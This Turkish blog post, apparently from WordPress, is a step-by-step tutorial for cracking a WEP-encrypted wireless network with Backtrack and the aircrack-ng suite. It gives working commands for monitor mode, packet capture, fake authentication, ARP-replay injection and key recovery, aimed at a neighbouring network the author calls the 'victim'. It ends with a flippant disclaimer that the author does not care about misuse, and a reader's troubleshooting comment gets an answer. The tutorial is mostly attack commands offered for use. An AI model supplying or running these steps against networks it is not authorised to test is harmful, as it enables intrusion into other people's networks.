8 Adımda Wireless Hack (WEP)

Posted on Updated on

Bu yazıda WEP ile şifrelenmiş bir wireless ağının kırılmasını anlatmaya çalışacağım…
Öncelikle gerekli malzemeler;

 • Göze kestirilen bir Wireless Router (Parola güvenliği WEP olmalı)
 • Injection destekleyen bir Wireless Card (Benim tavsiyem Atheros,Ralink veya en iyisi Realtek 8187L chipsetli bir wireless kart.) Wireless kartınızın modelinizi aygıt yöneticisinden görebilirsiniz.
 • Backtrack
 • USB Flash Disk(>2GB)(USB den boot olarak çalıştırmak istiyorsanız; boot USB hazırlamak için UNetbootin programını kullanabilirsiniz),DVD Boot veya Sanal Makine (Sanal Makinede çalışacaksanız USB şeklinde takılabilir bir Chipsetiniz olmalı)

Bunlar elinizde mevcutsa gerisi teferruat.backtrack’ı çalıştırdık,terminali açtık ve komut yazmaya başlayalım…Adım adım işleyelim komutları;

1.Adım:

iwconfig

adım1
Bu komut ile bilgisayarınızdaki ethernet ve wireless’in durumunu görebilirsiniz. wlan0 ‘ı göremiyorsanız; Wireless Chipsetiniz görünmüyor demektir.


2.Adım:

airmon-ng start wlan0

adım2

Burada Wireless kartımızın dinleme yapması için bir monitor etkinleştiriyoruz.Wireless chipset modeli ve etkin monitor(mon0) burada görülebilir.


3.Adım

airodump-ng mon0

adım3adım3.1

Çevremizde ki ağları bulmak için etkinleştirdiğimiz mon’dan tarama yapıyoruz . Burada ağ isimlerini(ESSID), modem mac adreslerini(BSSID),sinyal güçlerini(PWR) (Sinyal gücü 0’a yakın olan yani mutlak değeri küçük olan cihaz bize en yakın olandır) , hangi kanaldan yayın yaptıkları(CHANNEL) ve şifreleme tekniklerini(ENC) görmek mümkün. Burada ki kurbanımız; ‘zeytin’ adlı WEP şifreleme tekniği kullanan bir modem. CTRL+C tuşu ile taramayı durdurarak bütün kanallardan tarama yapmasını kapatmamız lazım. Çünkü; saldıracağımız modeme tek bir kanal üzerinden dinleme yapacağımız için daha hızlı sonuç almamızı sağlayacak.


4.Adım:

airodump-ng -c (kanal) -w (dosyaAdı) --bssid (Modem_Mac) (monitor)

adım4

Benim saldırdığım ağ için örnek komut yukarıdaki gibi olacak. ‘-c’ den sonra gelen ‘6’ sayısı hangi kanaldan yayın yaptığını, ‘-w’ den sonra gelen ‘paketToplamaDosyasi’ da, toplanacak paketlerin hangi isim altında kaydetmek istediğinizi belirtir. ‘mon0’ da daha önce etkinleştirdiğimiz dinleme yaptığımız monitor. Bu komutu çalıştırdıktan sonra 6. kanal üzerinde belirtilen ağı dinliyoruz.

adım4.1


5.Adım:

macchanger  --show (monitor)

Bu komut ile kendi mac adresimizi elde ediyoruz.

adım5


6.Adım:

aireplay-ng -1 0 -a (modemMac) -h (BizimMac) -e (AğAdı) (monitor)

adım6

Karşı modem ile bağlantı kurmaya çalışıyoruz. Eğer gülücük işaretini gördüyseniz bağlantı tamamdır …Bu olaydan sonra paketler gidip gelmeye başlayacaktır…

adım6.1


7.Adım: 

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b  (modemMac) -h (bizimMac) mon0

adım7

Bu komutun amacı arp-spoofing ile paket toplamayı hızlandırmak… Komutu çalıştırdıktan sonra bize bir paket içeriği gösterecek ve bunu kullanıp kullanmayacağımızı soracak. ‘y’ (yes) tuşuna bastıktan sonra… Paketler su gibi akacaktır…

adım7.1


8.Adım:

aircrack-ng -b (modemMac) (dosyaAdı)

Yeterli miktarda(bolca) paket topladıysanız eğer bu komutu çalıştırabilirsiniz.
adım8 adım8.1

Toplanılan paketlerde şifre denemesini yukarıda görebilirsiniz. Eğer toplanılan paketler yetersiz ise biraz bekleme yapacak ve kendisi otomatik denemeye devam edecektir. Eğer şifre toplanılan paketlerden elde edilmiş ise ;
adım8.2

Karşınıza şifreyi direk olarak verecektir. Burada ‘:’ işareti olmadan şifreyi direk yazabilirsiniz.

NOT: Tamamen eğitim amaçlıdır,kötü amaçlar için kullanacaksınız ben karışmam 🙂

Advertisement

3 thoughts on “8 Adımda Wireless Hack (WEP)

  eren said:
  09 February 2013 at 01:02

  hocam use this packet sorusunu alamıyorum sorunum ne olabilir

   uceka responded:
   09 February 2013 at 10:42

   Komutun içinde ki ‘-c FF:FF:FF:FF:FF:FF’ ifadesi ile modemin yayın yaptığı bütün adreslere yayın yapıyoruz aslında. Eğer packet okuma işlemi çok uzun sürüyor cevap gelmiyorsa… Modemin cevap gönderdiği bir mac adresi yok demektir,yani o anda internete bağlı değiller demektir.

  Paige Wilkins said:
  08 January 2023 at 02:50

  Lovely blog you havee here

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s